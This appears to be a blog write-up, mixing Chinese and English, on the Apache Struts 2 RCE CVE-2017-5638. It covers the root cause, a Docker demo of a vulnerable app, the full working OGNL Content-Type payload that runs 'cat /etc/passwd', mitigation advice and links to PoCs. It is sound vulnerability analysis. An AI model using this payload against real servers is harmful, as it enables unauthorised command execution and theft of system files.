CWE-2017-5638

Root cause

Update 18 Mar 2017:
Will it Pwn CVE-2017-5638: Remote Code Execution in Apache Struts 2? - 这篇Post对于分析更详细。


TrendLabs Security Intelligence Blog 通过分析 struts source code 解释了RCE 的root cause.

As per documentation, struts.multipart.parser used by the fileUpload interceptor to handle HTTP POST requests, encoded using the MIME-type multipart/form-data, can be changed out. Currently there are two choices, jakarta and pell. The jakarta parser is a standard part of the Struts 2 framework needing only its required libraries added to a project. As from Struts version 2.3.18 a new implementation of MultiPartRequest was added – JakartaStreamMultiPartRequest. It can be used to handle large files.

Demo

Setup

利用 docker, 我们可以快速做一次 demo.

$ wget https://dist.apache.org/repos/dist/release/struts/2.3.31/struts-2.3.31-apps.zip
$ unzip struts*.zip

Dockfile

FROM tomcat:7-jre8
ADD struts-2.3.31/apps/struts2-blank.war /usr/local/tomcat/webapps/
CMD ["catalina.sh", "run"]
$ docker build -t struts/s2_045 .
$ docker run -it --rm -p 8080:8080 struts/s2_045

Visit http://localhost:8080/struts2-blank

Payload

Content-Type:%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```

![](/content/images/2017/03/struts2_rce.png)

### Source Code Review

自查方式:用户可查看web目录下/WEB-INF/lib/目录下的struts-core.x.x.jar文件,如果这个版本在Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10之间则存在漏洞。


### Mitigation

Upgrade to Struts 2.3.32 or Struts 2.5.10.1

## Bonus

当需要拦截 localhost的通讯, 需要在URL 后添加一个<span style="background:yellow">.</span> , 即<span style="background:yellow">localhost.</span>
![](/content/images/2017/03/Screen-Shot-2017-03-21-at-10.38.07-AM.png)


## Ref

- [S2-045 - Apache Struts 2 Documentation - Apache Software Foundation](https://cwiki.apache.org/confluence/display/WW/S2-045?from=groupmessage%22)
- [Apache Struts2の脆弱性(CVE-2017-5638)を検証してみた - とある診断員の備忘録](http://tigerszk.hatenablog.com/entry/2017/03/08/063334)
- [Exploit RCE para Apache Struts (CVE-2017-5638) o cómo miles de servidores en Internet están en peligro : hackplayers](http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html)
- [新闻中心-杭州安恒信息技术有限公司-应用安全和数据库安全的领航者](http://www.dbappsecurity.com.cn/news/n2017/201703_09_01.html)

POC:

- [tengzhangchao/Struts2_045-Poc: Struts2-045 POC](https://github.com/tengzhangchao/Struts2_045-Poc)
- [Qualys ThreatPROTECT](https://threatprotect.qualys.com/2017/03/08/apache-struts-jakarta-multipart-parser-remote-code-execution-vulnerability/)
- [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/8064)
- [pwntester/S2-046-PoC: S2-046-PoC](https://github.com/pwntester/S2-046-PoC)
Show Comments